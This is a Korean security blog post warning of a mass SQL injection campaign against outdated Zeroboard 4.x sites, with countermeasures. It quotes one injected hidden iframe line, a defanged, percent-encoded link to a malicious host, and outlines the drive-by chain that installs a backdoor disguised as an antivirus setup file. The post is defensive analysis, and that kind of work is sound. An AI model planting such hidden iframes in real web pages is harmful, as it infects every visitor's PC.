태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

Zeroboard 4.X 버전 취약성을 이용한 mass sql Injection 발생. 물론 매주 수십 건의 대규모 이슈들이 발생되지만 이건은 더 쉽고 빠르게 확산 되고 있어서 경고차 언급 함.


최근 2~3건의 대규모 악성링크 삽입과 연관되어 있음.

악성링크는 MS XML , IE , Flash, Java 공격 코드와 연계 되어 있다. 최종 사용자 PC에 설치되는 악성코드는 안랩의 셋업 파일을 위장.


요즘 어설픈 위장들이 이렇게 많은건지? .. 속는 사람들도 많을듯.


Zeroboard 4.* 이전 버전을 사용하는 곳들은 관리든 무엇이든 통제가 필요할 듯. 우리쪽에서만 벌써 단 하루에 몇 십곳 이상을 동시에 권한획득하고 웹페이지 변조도 없고 DB 정보도 빼내어가지 않고 단지 악성코드를 감염 시키기 위한 매개체로만 이용하고 있음.


절차


1. 제로보드 이전 버전 취약성에 대해 자동화된 공격 도구로 공격 ( Mass sql i 추정) 로그를 보면 확인 가능하나 우린 로그 볼 권한이 없는 관계로 패스..


2. 아주 짧은 시간에 수십 여개 이상의 사이트에 대해 ASCII 코드로 된 코드를 웹 소스에 인위적으로 추가함.  

<td colspan="3" align="center"><!--요기위까지 head -->

<iframe src='hxxp://%77%77%77~~~~~~~%30%30%2E%63%6F%6D/index.html' width=10 height=0></iframe>제품문의 및 A/S관련은 문의


3. 이제 해당 웹 사이트들을 방문 하는 모든 사용자들은 추가된 악성링크가 자동 실행 되어 사용자 PC에 영향을 줌.


4. 해당 악성링크는  사용자 브라우저 , Java, Flash 버전을 체크하는 코드로 되어 있고 각 버전에 맞는 공격코드가 실행 되도록 되어 있음.


5. 공격 성공후 사용자 PC에 그 어떤 보안 Alert 없이 최종 악성파일을 설치함. 현재 최종 악성파일은 원격 조정이 가능한 백도어 류임.  ( 국내 아주 일부 백신 현재 탐지)


6. 얼마나 많이 좀비 PC가 확보 되었느냐에 따라 다음일은 공격자의 마음임.



요게 오늘 새벽에 발생된 과정의 프로세스임.

이미 9월에만 세건 가량 발생 되었고 삭제 유무와 관계 없이 계속해서 공격이 발생 되고 있음. 


지금 이 공격의 문제점은 웹 사이트 관리 측면의 문제는 일단 차지하고 ( 권한 획득 당해서 소스를 공격자가 직접 다루는 상황에서 정보 유출을 이야기 한다는 것은 웃기지도 않은 이야기임)  이런 커뮤니티 및 웹 서비스를 방문하는 모든 사용자들이 당첨 확율 60% 이상의 악성코드에 직접 영향을 받는다는 것임. 


Aftereffect 


1 .  권한 획득 당한 웹 사이트들의 DB 정보는 아주 예전 부터 공격자의 것. 가져갈 가치도 없을 만큼 너무 많은 공격을 당했음.


2.  웹서비스 방문자들의 높은 감염 비율 - 백도어 및 계정 유출 악성코드의 감염 계속  . 웹 서핑을 안 할 수 있을까? 커뮤니티 및 학교, 동창회, 상품 구매, 쇼핑 페이지에 방문 하지 않는 인터넷 사용자는 얼마나 될까?


3. 만약 중요한 기관이나 기업에 근무하는 사용자의 PC에 감염될 경우 - 농협과 같은 치명적 사고는 이미 예정된 일 , 그렇지 않더라도 온라인 상의 사용자 계정은 계속 유출되어 게임 회사, 포털 , 금융과 같은 핵심적인 인터넷 상거래 분야에 지속적인 영향을 미침


4. 그 이외에도 일정 규모 이상의 좀비 PC가 수집 되었을 경우.. DDoS 공격은 애교라고 봐야 할 것임.



대책 이라고 할 것이 무엇이 있을까?


각 단계별 대책들이 필요할 것이다. 


대책


* 취약한 웹 사이트에 대한 보완과 관리  - 일단 악성코드를 뿌리는 숙주로는 이용 당하지 말아야 겠죠. 제로보드의 경우 이전 버전의 업그레이드 , 그외 일상적으로 발생 되는 문제의 경우는 웹 서비스에 대한 취약성 진단의 일상화가 요구됨. Secure coding으로 Web service의 안정성을 확보 할 수 있을까요? 빠른 개발 속도를 감내 가능 할까요? 


* 대규모로 뿌려지는 악성코드에 대한 대책 - 기본적으로 웹소스에 추가된 악성링크도 매번 변경 하기 어려우므로 빠른 시기에 조기 탐지하여 대응 할 수 있어야 하고 피해 범위를 줄여야 함. 중요 기업 및 기관의 경우 인터넷 서핑 금지가 불가능한 현재의 상황에서 선제적으로 위험을 차단하고 줄일 수 있는 방안이 필요함.


* 이미 감염된 악성코드들이 원격에서 통제 되어 대규모 좀비 PC 군단으로 이용 되는 것을 막기 위한 효율적 대응 방안 필요. 명령 받는 곳이라도 짤라야 겠죠. 만약 있다면 말입니다. 


* 최종적으로는 국내의 주요 백신들을 활용한 악성코드 흔적의 제거가 되겠죠.



공격자에게 극단적으로 유리한 지금의 프로세스는 공격이 1의 노력만으로 원하는 목적을 얻는 다면 막는 입장에서는 그 노력의 최소한 수백배 이상을 들여야 문제의 확산을 막을 수 있습니다.   이 환경은 지금껏 우리가 조성한 결과일 뿐입니다.  기본적인 환경의 개선과 보완은 외면하고 이익만을 쫓은 결과 기둥뿌리가 썩은 결과이죠.


지금은.. 어찌 할 수가 없어요. 다만 못 보는 자들을 위해 현실을 알게 해주는 것외에는...


-바다란


저작자 표시
신고
Posted by 바다란